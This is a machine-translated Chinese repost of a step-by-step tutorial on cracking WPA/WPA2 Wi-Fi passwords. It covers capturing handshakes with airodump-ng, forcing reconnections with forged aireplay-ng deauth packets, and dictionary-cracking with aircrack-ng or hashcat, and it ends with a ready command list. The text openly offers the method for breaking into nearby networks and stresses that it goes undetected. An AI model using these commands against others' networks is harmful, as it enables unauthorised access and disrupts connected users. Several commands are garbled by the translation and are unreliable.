使用Aircrack-ng和Hashcat破解WPA / WPA2 Wi-Fi路由器

使用Airodump-ng和Aircrack-ng / Hashcat破解WPA / WPA2 Wi-Fi路由器。

这是一个简短的演练教程,演示了如何破解使用弱密码保护的Wi-Fi网络。它并非详尽无遗,但它应该足以让您测试自己网络的安全性或闯入附近的网络。下面列出的攻击完全是被动的(仅监听,没有任何内容从您的计算机广播),如果您实际上没有使用您破解的密码,则无法检测到。可选的主动解除身份验证攻击可用于加速侦察过程,本文档末尾对此进行了描述。

如果您熟悉此过程,则可以跳过描述并跳转到底部使用的命令列表。本教程也发布在GitHub上。在那里阅读最新的t0-date版本和BASH语法高亮。

免责声明:本软件/教程仅用于教育目的。它不应该用于非法活动。作者不对其使用负责。不要成为一个鸡巴。

入门

本教程假设您:

  • 使用命令行具有一般的舒适性
  • 正在运行基于debian的Linux发行版(最好是Kali linux
  • 拥有了Aircrack-ng的安装(sudo apt-get install aircrack-ng
  • 有一个支持监控模式的无线网卡(我推荐这个。请看这里了解更多信息。)

破解Wi-Fi网络

监控模式

首先列出支持监控模式的无线接口:

airmon-NG

如果您没有看到列出的接口,则说明您的无线网卡不支持监控模式😞

我们假设您的无线接口名称是,wlan0但如果它与此不同,请务必使用正确的名称。接下来,我们将接口置于监控模式:

airmon-ng start wlan0

iwconfig。您现在应该看到列出了一个新的监控模式界面(可能mon0wlan0mon)。

找到你的目标

使用您的监视器界面开始收听附近无线路由器广播的802.11 Beacon帧

airodump-ng mon0

你应该看到类似于下面的输出。

CH 13] [经过时间:52 s] [2017-07-23 15:49 
 
BSSID PWR Beacons #Data,#/ s CH MB ENC CIPHER AUTH ESSID 
 
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests 
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length:0> 
14:22:DB:1A:DB:66-83 48 0 0 1 54e。WPA2 CCMP PSK steveserro 
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme 
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome 
06 :26:BB:75:ED:69-84 232 0 0 1 54e。WPA2 CCMP PSK HH2 
78:71:9C:99:67:D0 -82 339 0 0 1 54e。WPA2 CCMP PSK ARRIS-67D2 
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e。WPA2 CCMP PSK Comcast_2EEA-EXT 
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca

出于本演示的目的,我们将选择破解我的网络密码“hackme”。记住显示的BSSID MAC地址和channel(CH)号码airodump-ng,因为下一步我们都需要它们。

捕获4方握手

WPA / WPA2使用4次握手来验证网络设备。您不必知道这意味着什么,但您必须捕获其中一个握手以破解网络密码。只要设备连接到网络,就会发生这些握手,例如,当您的邻居下班回家时。我们通过airmon-ng使用从上一个命令发现的channel和bssid值来指示监视目标网络上的流量来捕获此握手。

#replace -c和 -  bssid值与目标网络的值
#-w指定我们将保存数据包捕获的目录
airodump-ng -c 3  -  bssid 9C:5C:8E:C9:AB:C0 -w。mon0 CH 6] [经过:1分钟] [2017-07-23 
 
16:09 ] BSSID PWR RXQ信标#Data,#/ s CH MB ENC CIPHER AUTH ESSID 
 
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS

现在我们等待……一旦你抓住握手,你应该看到[ WPA handshake: bc:d3:c9:ef:d2:67屏幕右上角的东西,就在当前时间的右边。

如果您感到不耐烦,并且习惯使用主动攻击,则可以强制连接到目标网络的设备重新连接,并向其发送恶意解除身份验证数据包。这通常会导致捕获4次握手。有关此信息,请参阅下面的deauth攻击部分。

抓住握手后,按ctrl-c退出airodump-ng。你应该.cap在任何地方看到一个文件airodump-ng来保存捕获(可能被称为-01.cap)。我们将使用此捕获文件来破解网络密码。我想重命名此文件以反映我们试图破解的网络名称:

mv ./-01.cap hackme.cap

破解网络密码

最后一步是使用捕获的握手破解密码。如果您可以访问GPU,我强烈建议您使用hashcat密码破解。我创建了一个简单的工具,使得hashcat超级易用naive-hashcat。如果您无法访问GPU,则可以使用各种在线GPU破解服务,如GPUHASH.meOnlineHashCrack。你也可以用Aircrack-ng尝试CPU破解。

请注意,下面的两种攻击方法都假定用户生成的密码相对较弱。大多数WPA / WPA2路由器都带有强大的12个字符随机密码,许多用户(正确地)保持不变。如果您尝试破解其中一个密码,我建议使用Probable-Wordlists WPA长度字典文件。

破解naive-hashcat(推荐)

在我们使用破解密码之前naive-hashcat,我们需要将.cap文件转换为等效的hashcat文件格式.hccapx。您可以通过将.cap文件上传到https://hashcat.net/cap2hccapx/cap2hccapx直接使用该工具轻松完成此操作。

cap2hccapx.bin hackme.cap hackme.hccapx

接下来,下载并运行naive-hashcat

#下载
混帐克隆https://github.com/brannondorsey/naive-hashcat
 CD朴素hashcat #下载134MB RockYou的字典文件
卷曲-L -o类型的字典/ rockyou.txt https://github.com/brannondorsey/naive- hashcat / releases / download / data / rockyou.txt #crack!宝贝!破解!
#2500是WPA / WPA2的hashcat哈希模式
HASH_FILE = hackme.hccapx POT_FILE = hackme.pot HASH_TYPE = 2500 ./naive-hashcat.sh

Naive-hashcat使用各种字典规则组合掩码(智能暴力)攻击,并且可能需要数天甚至数月才能针对中等强度密码运行。破解的密码将保存到hackme.pot,因此请定期检查此文件。一旦你破解了密码,你应该看到这样的内容作为你的内容POT_FILE

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:华硕:hacktheplanet

分隔的最后两个字段分别:是网络名称和密码。

如果您想使用hashcat而不naive-hashcat这个页面的信息。

Cracking With Aircrack-ng

Aircrack-ng可用于在CPU上运行的非常基本的字典攻击。在您运行攻击之前,您需要一个单词列表。我建议使用臭名昭着的rockyou字典文件:

#下载134MB rockyou词典文件
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

请注意,如果网络密码不在wordlist中,则不会破解密码。

#-a2指定WPA2,-b是BSSID,-w是wordfile aircrack 
-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

如果密码被破解,您将KEY FOUND!在终端中看到一条消息,后面是网络密码的纯文本版本。

Aircrack-ng 1.2 beta3 [00:01:49] 111040键测试(1017.96 k / s)KEY FOUND![hacktheplanet] 主钥匙:A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E 瞬态钥匙:CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 EAPOL HMAC:9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Deauth攻击

deauth攻击会将伪造的解除身份验证数据包从您的计算机发送到连接到您尝试破解的网络的客户端。这些数据包包括虚假的“发件人”地址,这些地址使它们对客户端显示,就像它们是从接入点本身发送的一样。收到此类数据包后,大多数客户端都会断开网络连接并立即重新连接,如果您正在收听,则会为您提供4次握手airodump-ng

使用airodump-ng监视特定的接入点(使用-c channel --bssid MAC),直到你看到一个客户端(STATION)相连。连接的客户端看起来像这样,64:BC:0C:48:97:F7客户端MAC 在哪里。

CH 6] [经过时间:2分钟] [2017-07-23 19:15] 
 
BSSID PWR RXQ信标#Data,#/ s CH MB ENC CIPHER AUTH ESSID 
 
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK华硕
 
BSSID站PWR速率丢失帧探测器
 
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e-1e 4 6479华硕

现在,离开airodump-ng跑步并打开一个新的终端。我们将使用该aireplay-ng命令向我们的受害客户端发送虚假的deauth数据包,强制它重新连接到网络,并希望在此过程中抓取握手。

#-0 2指定我们要发送2个deauth数据包。增加此号码
#如果需要,可能会有明显中断客户端网络活动的风险
#-a是接入点
的MAC#-c是客户端的MAC 
aireplay-ng -0 2 -a 9C:5C:8E:C9 :AB:C0 -c 64:BC:0C:48:97:F7 mon0

您可以选择将deauth数据包广播到所有连接的客户端:

#并非所有客户都尊重广播deauths虽然
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0

一旦你发送了deauth数据包,请回到你的airodump-ng过程,运气好的话,你现在应该在右上角看到这样的东西:[ WPA handshake: 9C:5C:8E:C9:AB:C0。现在您已经抓住了握手,您应该准备好破解网络密码。

命令列表

下面是按顺序破解WPA / WPA2网络所需的所有命令的列表,只有极少的解释。

#将你的网络设备置于监控模式下
airmon-ng start wlan0 #listen所有附近的信标帧以获得目标BSSID和信道
airodump-ng mon0 #start listen for the handshake 
airodump-ng -c 6  -  bssid 9C:5C:8E: C9:AB:C0 -w capture / mon0 #可选deauth一个连接的客户端强制握手
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97 :F7 mon0 ##########使用aircrack-ng破解密码... ########### 下载134MB rockyou.txt字典文件,如果需要
curl -L -o rockyou.txt https: //github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt#crack w / aircrack-ng 
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou。 txt capture / -01.cap##########或使用naive-hashcat破解密码########## #conc cap to hccapx 
cap2hccapx.bin capture / -01.cap capture / -01.hccapx #crack with naive-hashcat 
HASH_FILE = hackme.hccapx POT_FILE = hackme.pot HASH_TYPE = 2500 ./naive-hashcat.sh

郑重声明:本站所有资源来自互联网公开渠道,均为网友上传交流学习,软件版权均归原制作公司所有,如有侵犯版权,请与[email protected]联系,我们将立即删除。
Z2ER » 使用Aircrack-ng和Hashcat破解WPA / WPA2 Wi-Fi路由器